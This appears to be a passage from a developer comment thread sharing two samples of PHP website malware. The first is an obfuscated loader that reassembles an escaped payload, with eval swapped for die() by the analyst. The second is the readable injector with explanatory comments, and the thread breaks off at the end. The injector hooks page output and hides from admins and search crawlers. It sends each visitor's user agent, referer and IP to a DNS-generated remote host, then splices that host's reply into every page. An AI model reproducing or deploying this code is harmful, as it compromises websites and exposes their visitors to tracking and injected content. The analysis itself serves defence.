c%x7825w6Z6PNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x786]y85]82]y76]62]y3:]84#-!OVMM*2]y3d]51]y35]274]y4:]82]ysb!>
!ssbnpe_GMFT%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FU%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#25z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7572]48y]#>m%x5c%x7825:|:*r%3:]62]y4c#<!%x5c%x7825t::!>!%x5o]s]#)fepmqyf%x5c%x7827*c%x7825zW%x5c%x7825h>EzH:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<hx5c%x7825<#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]%162%x61%171%x5f%155%x61%160%x28%#]y76]277]y72]265]y39]274]y85]273]y6g]273]y>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#epdof%x5c%x786057ftbc%xc%x7825%x5c%x782fh%x5c%x7825ft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5cc%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]25x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x7824-%x5c%x7824-tusqpt)%x5c%56<*Y%x5c%x7825)fnbozcYufhA%4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x782!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x782x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)!gx5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x78!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%x7825mmx7825t2w>#]y74]273]y76]252]y%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%-111112)eobs%x5c%x7860un>qp%x5c%xeturn chr(ord($n)-1);} @error_reporting(0); x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufsgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5p%x5c%x7825mm)%x5c%x7825%%x5c%x782f#)rrd%x5c%x782f#00;quui#>.%x5c%x78%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c25!<***f%x5c%x7827,*e25j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825j:,,Bjg!2985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]8<%x22%51%x29%51%x29%73", 
NULL);c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x7pd%x5c%x78256<pd%x5c%x7825w5!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x78256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277].fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x&7-n%x5c%x7825)utjm6<%x5c%x787fw6*tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]KfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x78 }s)%x5c%x7825j>1<%x5c%x7825j=6[7>%x5c%x782f7&6|7**111127-K)ebfsX%x5c%x7885]256]y6g]257]y86]267]y74]275]y7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x78277825!|Z~!<##!>!2p%x5c%x78%62%x35%165%x3a%146%x21^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gp5%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c5h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x57825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#)ujojR%x5c%x7827id%x5c%x78x5c%x7878:-!%x5c%x7825tzw%x5c4%162%x5f%163%x70%154%x69%164%50%x22%134%x75c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x7842%x66%152%x66%147%x67%42%x2c%163%x7)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x782ufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~2]285]Ke]53Ld]53]Kc]55Ld]5587fw6*CW&)7gj6<.[A%x5c%x7827&6<%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%<.5%x5c%x7860hA%x5c%x7826Z6<.4%x5c%x7860hA%x5c%x7%x785cq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7]364]6]234]342]58]24]31#-%x5c%x7U,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*<~%x5c%x7824<!%x5c%x7825o:!>&& (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { 
%x782f},;#-#}+;%x5c%x7825-qpx5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!c%x785c1^-%x5c%x7825r%x5c%x785c2^-%825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyfy72]265]y39]271]y83]256]y78]248]y83]256]%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%]y7d]252]y74]256#<!%x5c%x7825f!>!#]y81]273]y76]258]y6g]273]y76]271x7825z-#:#*%x5c%x7824-%x5cc%x78256<C%x5c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<*&7-#o]s]%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7785csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f295c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x782x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c142%x5f%163%x74%141%x72%164") #jt0}Z;0]=]0#)2q%x5c%x7825l}S;2CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x782525)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJ5c%x7825%x5c%x787f!~!<##!>!2p%x5c%xx5c%x7825:-t%x5c%x7825)3of:opjudovg5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*dyf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpj^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%oj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<-u%x5c%x7825!-#2#%x5c%x782f#%xx5c%x7825,3,j%x5c%x7825>j%x5cpd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x7824!>!tus%x5c%x7860sfqmbdf)%x86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%f%x5c%x78604%x5c%x78223}!+!<+{e%x5#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7sut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x7824b!>!%x5c%x7825yy)#}#-#2f7#@#7%x5c%x782f7^#iubq#%x5c5%166%x61%154%x28%151%x6d%160%x6c%157%x64%145%x28%141%x720QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787o)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%f2!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x782zbe!
-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%$GLOBALS["%x61%156%x75%156%x61"]=1; function fjfgg($n){r5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%xj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcx7825V<*#fopoV;hojepdoF.u860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c8297f:5297e:56-%x5c%x7878r.985:5%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x55c%x7825-#1]#-bubE{h%x5c%x7825)%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x78257-K)udfoopdXA%x5c%x7822)7gif((function_exists("%x6f%/(.*)/epreg_replacesgeocmclkg';

$wzrfkwxlic = array(
  0 => '10080',
  1 => '26',
  2 => '8123',
  3 => '30',
  4 => '7364',
  5 => '50',
  6 => '9534',
  7 => '56',
  8 => '5242',
  9 => '44',
  10 => '136',
  11 => '45',
  12 => '9176',
  13 => '57',
  14 => '4378',
  15 => '33',
  16 => '6894',
  17 => '36',
  18 => '6743',
  19 => '43',
  20 => '6303',
  21 => '24',
  22 => '2782',
  23 => '44',
  24 => '2424',
  25 => '32',
  26 => '834',
  27 => '21',
  28 => '3834',
  29 => '34',
  30 => '7156',
  31 => '24',
  32 => '5700',
  33 => '28',
  34 => '7180',
  35 => '25',
  36 => '6221',
  37 => '58',
  38 => '8758',
  39 => '60',
  40 => '7795',
  41 => '59',
  42 => '4228',
  43 => '24',
  44 => '5858',
  45 => '34',
  46 => '8184',
  47 => '34',
  48 => '6147',
  49 => '41',
  50 => '2071',
  51 => '20',
  52 => '8053',
  53 => '70',
  54 => '983',
  55 => '22',
  56 => '1123',
  57 => '40',
  58 => '9831',
  59 => '35',
  60 => '5438',
  61 => '49',
  62 => '10048',
  63 => '32',
  64 => '1214',
  65 => '64',
  66 => '5954',
  67 => '55',
  68 => '2502',
  69 => '26',
  70 => '4839',
  71 => '50',
  72 => '4745',
  73 => '28',
  74 => '5002',
  75 => '62',
  76 => '9147',
  77 => '29',
  78 => '9466',
  79 => '68',
  80 => '3451',
  81 => '66',
  82 => '7205',
  83 => '51',
  84 => '9791',
  85 => '40',
  86 => '8383',
  87 => '63',
  88 => '8662',
  89 => '37',
  90 => '5821',
  91 => '37',
  92 => '2111',
  93 => '50',
  94 => '1759',
  95 => '32',
  96 => '2886',
  97 => '42',
  98 => '8218',
  99 => '57',
  100 => '7288',
  101 => '48',
  102 => '6688',
  103 => '26',
  104 => '886',
  105 => '65',
  106 => '7061',
  107 => '31',
  108 => '1342',
  109 => '59',
  110 => '1719',
  111 => '40',
  112 => '2396',
  113 => '28',
  114 => '2697',
  115 => '64',
  116 => '2456',
  117 => '46',
  118 => '4555',
  119 => '49',
  120 => '7639',
  121 => '64',
  122 => '4944',
  123 => '58',
  124 => '9647',
  125 => '57',
  126 => '5286',
  127 => '47',
  128 => '4889',
  129 => '55',
  130 => '5728',
  131 => '45',
  132 => '1087',
  133 => '36',
  134 => '1401',
  135 => '24',
  136 => '9951',
  137 => '31',
  138 => '8604',
  139 => '58',
  140 => '8729',
  141 => '29',
  142 => '472',
  143 => '67',
  144 => '385',
  145 => '36',
  146 => '9704',
  147 => '62',
  148 => '421',
  149 => '51',
  150 => '1191',
  151 => '23',
  152 => '7529',
  153 => '70',
  154 => '0',
  155 => '41',
  156 => '8275',
  157 => '35',
  158 => '1603',
  159 => '23',
  160 => '1515',
  161 => '23',
  162 => '2761',
  163 => '21',
  164 => '85',
  165 => '51',
  166 => '1626',
  167 => '66',
  168 => '4674',
  169 => '37',
  170 => '5394',
  171 => '44',
  172 => '5487',
  173 => '21',
  174 => '1538',
  175 => '65',
  176 => '2014',
  177 => '57',
  178 => '5209',
  179 => '33',
  180 => '6279',
  181 => '24',
  182 => '2574',
  183 => '39',
  184 => '9072',
  185 => '48',
  186 => '7442',
  187 => '52',
  188 => '9898',
  189 => '53',
  190 => '855',
  191 => '31',
  192 => '723',
  193 => '62',
  194 => '1005',
  195 => '29',
  196 => '3981',
  197 => '69',
  198 => '3868',
  199 => '59',
  200 => '9233',
  201 => '53',
  202 => '2264',
  203 => '36',
  204 => '2826',
  205 => '60',
  206 => '3150',
  207 => '61',
  208 => '4504',
  209 => '23',
  210 => '785',
  211 => '49',
  212 => '6635',
  213 => '53',
  214 => '6426',
  215 => '37',
  216 => '7414',
  217 => '28',
  218 => '1890',
  219 => '61',
  220 => '6984',
  221 => '50',
  222 => '3065',
  223 => '29',
  224 => '2091',
  225 => '20',
  226 => '181',
  227 => '44',
  228 => '5333',
  229 => '37',
  230 => '3757',
  231 => '22',
  232 => '8973',
  233 => '34',
  234 => '352',
  235 => '33',
  236 => '6930',
  237 => '54',
  238 => '2300',
  239 => '50',
  240 => '3732',
  241 => '25',
  242 => '6463',
  243 => '70',
  244 => '7854',
  245 => '41',
  246 => '602',
  247 => '63',
  248 => '1450',
  249 => '65',
  250 => '9766',
  251 => '25',
  252 => '2613',
  253 => '51',
  254 => '8446',
  255 => '56',
  256 => '6844',
  257 => '50',
  258 => '951',
  259 => '32',
  260 => '3687',
  261 => '45',
  262 => '8153',
  263 => '31',
  264 => '8699',
  265 => '30',
  266 => '8345',
  267 => '38',
  268 => '9410',
  269 => '56',
  270 => '4411',
  271 => '43',
  272 => '3541',
  273 => '58',
  274 => '6009',
  275 => '36',
  276 => '3211',
  277 => '66',
  278 => '5119',
  279 => '28',
  280 => '6188',
  281 => '33',
  282 => '4276',
  283 => '44',
  284 => '9982',
  285 => '66',
  286 => '3326',
  287 => '65',
  288 => '4527',
  289 => '28',
  290 => '3391',
  291 => '60',
  292 => '288',
  293 => '64',
  294 => '7092',
  295 => '64',
  296 => '4320',
  297 => '58',
  298 => '4170',
  299 => '27',
  300 => '8310',
  301 => '35',
  302 => '7336',
  303 => '28',
  304 => '5064',
  305 => '55',
  306 => '7733',
  307 => '36',
  308 => '7703',
  309 => '30',
  310 => '9354',
  311 => '56',
  312 => '6359',
  313 => '67',
  314 => '8548',
  315 => '56',
  316 => '9120',
  317 => '27',
  318 => '4711',
  319 => '34',
  320 => '7769',
  321 => '26',
  322 => '8878',
  323 => '32',
  324 => '9590',
  325 => '57',
  326 => '8011',
  327 => '42',
  328 => '1842',
  329 => '48',
  330 => '225',
  331 => '63',
  332 => '3779',
  333 => '55',
  334 => '8502',
  335 => '46',
  336 => '9286',
  337 => '68',
  338 => '2528',
  339 => '46',
  340 => '3956',
  341 => '25',
  342 => '4197',
  343 => '31',
  344 => '5651',
  345 => '49',
  346 => '3038',
  347 => '27',
  348 => '5147',
  349 => '62',
  350 => '1163',
  351 => '28',
  352 => '6045',
  353 => '70',
  354 => '3094',
  355 => '56',
  356 => '4252',
  357 => '24',
  358 => '3517',
  359 => '24',
  360 => '2998',
  361 => '40',
  362 => '7494',
  363 => '35',
  364 => '2210',
  365 => '54',
  366 => '9007',
  367 => '65',
  368 => '665',
  369 => '24',
  370 => '6533',
  371 => '61',
  372 => '9866',
  373 => '32',
  374 => '5567',
  375 => '53',
  376 => '1791',
  377 => '51',
  378 => '4773',
  379 => '66',
  380 => '4454',
  381 => '50',
  382 => '1034',
  383 => '53',
  384 => '5892',
  385 => '62',
  386 => '7034',
  387 => '27',
  388 => '1425',
  389 => '25',
  390 => '1278',
  391 => '64',
  392 => '6786',
  393 => '58',
  394 => '3650',
  395 => '37',
  396 => '1692',
  397 => '27',
  398 => '2928',
  399 => '70',
  400 => '41',
  401 => '44',
  402 => '7256',
  403 => '32',
  404 => '689',
  405 => '34',
  406 => '7954',
  407 => '57',
  408 => '8910',
  409 => '63',
  410 => '3599',
  411 => '51',
  412 => '5508',
  413 => '59',
  414 => '7895',
  415 => '59',
  416 => '1951',
  417 => '63',
  418 => '539',
  419 => '63',
  420 => '6327',
  421 => '32',
  422 => '6117',
  423 => '30',
  424 => '3277',
  425 => '49',
  426 => '4104',
  427 => '66',
  428 => '8818',
  429 => '60',
  430 => '5370',
  431 => '24',
  432 => '6714',
  433 => '29',
  434 => '4050',
  435 => '54',
  436 => '2161',
  437 => '49',
  438 => '6594',
  439 => '41',
  440 => '4604',
  441 => '70',
  442 => '5773',
  443 => '48',
  444 => '7599',
  445 => '40',
  446 => '2350',
  447 => '46',
  448 => '2664',
  449 => '33',
  450 => '3927',
  451 => '29',
  452 => '5620',
  453 => '31',
  454 => '6115',
  455 => '2',
);

// Guarded definition: the loader is prepended to many files, so the helper may already
// exist when a second infected file is included in the same request.
if (!function_exists('tttchsrlcp')) {
    /**
     * Reassembles a string from slices of $b.
     *
     * $a is read as a flat list of (offset, length) pairs: element 2*i is the start
     * position and element 2*i+1 the length of the i-th slice. The slices are
     * concatenated in list order, which is how the shuffled payload string is put
     * back into its real order.
     *
     * @param array  $a flat list of offset/length pairs (numeric strings in this sample)
     * @param string $b the shuffled source string
     * @return string|null the concatenated slices; NULL when $a is empty
     */
    function tttchsrlcp($a, $b) {

        $whghqcixdu = NULL;

        // sizeof($a) / 2 pairs; each iteration appends one slice.
        for($i = 0; $i < (sizeof($a) / 2); $i++) {
            $whghqcixdu .= substr($b, $a[($i * 2)], $a[($i * 2) + 1]);
        }

        return $whghqcixdu;
    }
}

// Analyst's safe variant of the loader's last step: die() prints the decoded second
// stage and stops, where the raw sample's escaped string decodes to the same expression
// wrapped in eval(). chr(175-138) is "%" and chr(573-481) is "\", so every "%x5c"-style
// token in the reassembled text becomes a "\x5c"-style escape sequence.
// NOTE(review): in the raw sample the call goes through a variable function with two
// substr() slices of the payload string, whose tail reads "/(.*)/e" followed by
// "preg_replace" -- this appears to be the preg_replace /e evaluation trick, which no
// longer exists as of PHP 7.0. Confirm the slice offsets before relying on this.
$nfumbfnqsz = die(str_replace(chr((175-138)), chr((573-481)), tttchsrlcp($wzrfkwxlic,$tngmufxact)));


// Never reached here because die() ends the script. In the raw sample these are the
// values left behind after the call: (767-646) and that value minus one, which
// overwrite the payload string and the function name.
$nfumbfnqsz = 121;
$tngmufxact = 120;


klein0r commented Jul 10, 2015

#2

<?php

// Sample #2 (readable form). The whole body runs at most once per request:
// the "anuna" entry in $GLOBALS is an already-loaded marker, set here and
// tested by the guard. The same key, written with hex/octal escapes, is
// tested at the top of sample #1, which makes the literal a useful string to
// search for when sweeping a compromised site.
if((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
    $GLOBALS["anuna"]=1;
    // Returns the character whose code is one lower than the input's.
    // Nothing in this listing calls it.
    function fjfgg($n){return chr(ord($n)-1);}
    // Switches PHP error reporting off, so failures in the code below leave
    // no trace in page output or error logs.
    @error_reporting(0);

    // Thin wrapper around random(): returns a generated host name ending in
    // the suffix $qw. $domarr is not defined in this scope (the array of that
    // name is local to day212()), so the first argument is effectively null;
    // random() overwrites that parameter before using it.
    function cqq($qw) {
        return random($domarr,$qw);
    }

    // Symmetric XOR obfuscation used for both the outbound data and the
    // server's reply.
    //
    // A keystream $g is grown 8 bytes at a time. Each round hashes
    // (keystream so far . current key . "q1w2e3r4") with MD5, unpacks the hex
    // digest to raw bytes, makes that the new key and appends its first
    // 8 bytes. $s is then XORed with the keystream, and applying the function
    // twice with the same starting $q restores the input. The constant
    // "q1w2e3r4" is fixed in the code and works as a signature string for
    // this family.
    function en2($s, $q) {
        $g = "";
        while (strlen($g) < strlen($s)) {
            $q = pack("H*", md5($g.$q."q1w2e3r4"));
            $g.=substr($q,0,8);
        }

        // String XOR; PHP stops at the shorter operand, so the result is as
        // long as $s.
        return $s^$g;
    }

    // Generates the remote host name. The incoming $arr is discarded.
    //
    // The name is derived from DNS. gethostbyname() resolves "stat-dns" . $qw
    // (the only caller in this listing passes ".com"), the answer is
    // concatenated with $qw and hashed with MD5, and the 32 hex characters
    // are split into four 8-character chunks. One chunk plus $qw becomes the
    // host. Whoever controls that DNS record can therefore move the
    // infrastructure without touching infected sites. For detection, look
    // for lookups of that name from the web server and outbound HTTP to
    // 8-hex-character hosts.
    function random($arr,$qw) {
        $arr = str_split(md5($qw.gethostbyname("stat-dns".$qw)), 8);
        // The bounds are obfuscated arithmetic that works out to roughly 0
        // and 1.125. rand() takes integers, so, assuming truncation, the
        // index is 0 or 1: only the first two chunks are ever used.
        return $arr[rand((0.24-(0.03*8)),(0.1875*6))].$qw;
    }

    // Fetch method 1 of 4: file_get_contents() on the URL, with warnings
    // suppressed. Returns the body, or false when the function is missing or
    // the result is empty (a failed fetch also compares equal to "").
    function g_1($url) {
        if (function_exists("file_get_contents") === false) return false;
        $buf = @file_get_contents($url);
        if ($buf == "") return false;
        return $buf;
    }

    // Fetch method 2 of 4: cURL. Returns the response body, or false when
    // cURL is unavailable or nothing came back.
    function g_2($url) {
        if (function_exists("curl_init") === false) return false;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of printing it
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);       // give up after 10 seconds
        curl_setopt($ch, CURLOPT_HEADER, 0);         // body only, no response headers
        $res = curl_exec($ch);
        curl_close($ch);
        if ($res == "") return false;
        return $res;
    }

    // Fetch method 3 of 4: file() reads the URL into an array of lines, which
    // are joined back into one string. Returns false when file() is missing
    // or the joined result is empty.
    function g_3($url) {
        if (function_exists("file") === false) return false;
        $inc = @file($url);
        $buf = @implode("", $inc);
        if ($buf == "") return false;
        return $buf;
    }

    // Fetch method 4 of 4: a hand-written HTTP/1.0 GET over a raw TCP socket
    // to port 80, for hosts where the stream wrappers and cURL are not
    // available. Returns text taken from the response, or false on any
    // failure.
    function g_4($url) {
        if (function_exists("socket_create") === false) return false;
        $p= @parse_url($url);
        $host = $p["host"];
        if(!isset($p["query"])) $p["query"]="";
        $uri = $p["path"] . "?" . $p["query"];
        // Resolve the host, then round-trip the answer through ip2long() and
        // long2ip(). The two values match only when the answer is a dotted
        // IPv4 address, so an unresolved name is rejected here.
        $ip1 = @gethostbyname($host);
        $ip2 = @long2ip(@ip2long($ip1));
        if ($ip1 != $ip2) return false;
        $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if (!@socket_connect($sock, $ip1, 80)) {
            @socket_close($sock);
            return false;
        }

        // Request lines end in a bare "\n" rather than "\r\n".
        $req = "GET $uri HTTP/1.0\n";
        $req .= "Host: $host\n\n";
        socket_write($sock, $req);
        $buf = "";
        // Read in chunks of up to 10000 bytes until the read returns a falsy
        // value.
        while ($t = socket_read($sock, 10000)) {
            $buf .= $t;
        }

        @socket_close($sock);
        if ($buf == "") return false;
        // Split on blank lines: the first piece (headers) goes to $m and is
        // dropped, and the second piece is returned.
        list($m, $buf) = explode("\r\n\r\n", $buf);
        return $buf;
    }

    // Download helper: tries the four fetch methods in order
    // (file_get_contents, cURL, file(), raw socket) and returns the first
    // result that is not false, or "" when all four fail. The fallback chain
    // means disabling a single PHP function does not stop the outbound
    // request.
    function gtd ($url) {
        $co = "";
        $co = @g_1($url);
        if ($co !== false) return $co;
        $co = @g_2($url);
        if ($co !== false) return $co;
        $co = @g_3($url);
        if ($co !== false) return $co;
        $co = @g_4($url);
        if ($co !== false) return $co;
        return "";
    }

    // Manual gzip decoder: walks past the gzip header by hand and inflates
    // the raw deflate stream. Returns the decompressed data, or false when
    // the input does not start with the gzip magic bytes or inflation fails.
    if (!function_exists("comgzi")) {
        function comgzi($gzData) {
            // 1f 8b = gzip magic, 08 = deflate compression method.
            if (substr($gzData,0,3)=="\x1f\x8b\x08") {
                $i=10;                              // the fixed gzip header is 10 bytes
                $flg=ord(substr($gzData,3,1));      // flags byte
                if ($flg>0) {
                    // Bit 4: extra field, a 2-byte little-endian length
                    // followed by that many bytes.
                    if ($flg & 4) {
                        list($xlen)=unpack("v",substr($gzData,$i,2));
                        $i=$i+2+$xlen;
                    }

                    // Bit 8: NUL-terminated file name. Bit 16: NUL-terminated
                    // comment. Bit 2: 2-byte header CRC.
                    if ($flg & 8) $i=strpos($gzData,"\0",$i)+1;
                    if ($flg & 16) $i=strpos($gzData,"\0", $i)+1;
                    if ( $flg & 2) $i=$i+2;
                }

                // Inflate everything after the header, minus the 8-byte
                // trailer.
                return @gzinflate(substr($gzData,$i,-8));
            } else{
             return false;
            }
        }
    }

    // Obfuscates one value for the outbound URL: $text is XORed by en2()
    // under the key $op and the result is base64-encoded.
    function k34($op,$text) {
        return base64_encode(en2($text, $op));
    }

    // Reads $_SERVER[$param] and returns it, or the placeholder "non" when
    // the entry is missing or equal to "".
    function check212($param) {
        if(!isset($_SERVER[$param])) $a="non";
        else if ($_SERVER[$param]=="") $a="non";
        else $a=$_SERVER[$param];
        return $a;
    }

    // Core of the infection: reports the current visitor to the remote
    // server and returns whatever markup that server wants injected into the
    // page, or "" when nothing is to be injected.
    //
    // On every qualifying page view the visitor's user agent, referer and IP
    // address, plus the site's host name and the script path, leave the
    // server in a plain-HTTP request. The reply is decoded and spliced into
    // the HTML by pa22().
    function day212() {
        $a=check212("HTTP_USER_AGENT");
        $b=check212("HTTP_REFERER");
        $c=check212("REMOTE_ADDR");
        $d=check212("HTTP_HOST");
        $e=check212("PHP_SELF");
        // Assigned but never read in this function; cqq() cannot see it
        // because it is function-local.
        $domarr = array("33db9538","9507c4e8","e5b57288","54dfa1cb");
        // Stay silent when the user agent, client IP or host is missing, when
        // the script path contains "admin" (strrpos() is falsy for a match at
        // position 0), or when the user agent names one of the listed
        // crawlers. Site owners working in the admin area and search-engine
        // bots therefore never see the injected content.
        if (($a=="non") or ($c=="non") or ($d=="non") or strrpos(strtolower($e),"admin") or (preg_match("/" . implode("|", array("google","slurp","msnbot","ia_archiver","yandex","rambler")) . "/i", strtolower($a))) ) {
            $o1 = "";
        } else {
            // Per-request 6-digit key. It is sent in clear as the URL path,
            // so a captured request is enough to decode the request and its
            // response.
            $op=mt_rand(100000,999999);
            // The five values are each obfuscated with k34(), joined with
            // "." and URL-encoded twice.
            $g4=$op."?".urlencode(urlencode(k34($op,$a).".".k34($op,$b).".".k34($op,$c).".".k34($op,$d).".".k34($op,$e)));
            // Resulting shape: http://<generated host>.com/<6 digits>?<blob>
            $url="http://".cqq(".com")."/".$g4;
            // Fetch the reply and undo the XOR layer with the same key.
            $ca1=en2(@gtd($url),$op);
            // The injectable content is the piece after the first "!NF0"
            // marker; a reply without the marker yields nothing.
            $a1=@explode("!NF0",$ca1);
            if (sizeof($a1)>=2) $o1 = $a1[1];
            else $o1 = "";
        }

        return $o1;
    }

    // Best-effort decompressor for the output buffer: tries raw deflate, the
    // manual gzip parser comgzi(), zlib, and gzdecode() when it exists, in
    // that order. Returns the first successful result, or the input unchanged
    // when none apply, as for an uncompressed page. $length is accepted but
    // never used.
    if (!function_exists("dcoo")) {
        function dcoo($cz, $length = null) {
            if (false !== ($dz = @gzinflate($cz) ) ) return $dz;
            if (false !== ($dz = @comgzi($cz) ) ) return $dz;
            if (false !== ($dz = @gzuncompress($cz) ) ) return $dz;
            if (function_exists("gzdecode") ) {
                $dz = @gzdecode($cz);
                if (false !==$dz ) return $dz;
            }

            return $cz;
        }
    }

    // Output-buffer callback that performs the injection. $v is the page as
    // buffered by PHP; the return value is what the visitor receives.
    //
    // The buffer is decompressed if needed, then the text from day212() is
    // inserted immediately before the first closing body tag, or before the
    // first closing html tag when there is no body tag. Pages with neither
    // tag pass through unmodified apart from the decompression.
    if(!function_exists("pa22")) {
        function pa22($v) {
            // The page is sent uncompressed after modification, so the
            // encoding header is overridden. An unexpected
            // "Content-Encoding: none" response header is a visible symptom.
            Header("Content-Encoding: none");
            $t=dcoo($v);
            if(preg_match("/\<\/body/si",$t)) {
                // "$"."1" spells the "$1" backreference, so the original
                // closing tag is kept after the inserted text. The limit of 1
                // touches only the first match.
                return preg_replace("/(\<\/body[^\>]*\>)/si", day212()."\n"."$"."1", $t,1);
            } else {
                if(preg_match("/\<\/html/si",$t)) {
                    return preg_replace("/(\<\/html[^\>]*\>)/si", day212()."\n"."$"."1", $t,1);
                } else {
                    return $t;
                }
            }
        }
    }

    // Registers pa22() as the output-buffer callback: everything the request
    // prints after this point is buffered and passed through the injector
    // before it reaches the visitor. This one call is what ties the snippet
    // into every page that includes the infected file.
    ob_start("pa22");
}

@xavivars

Hi,

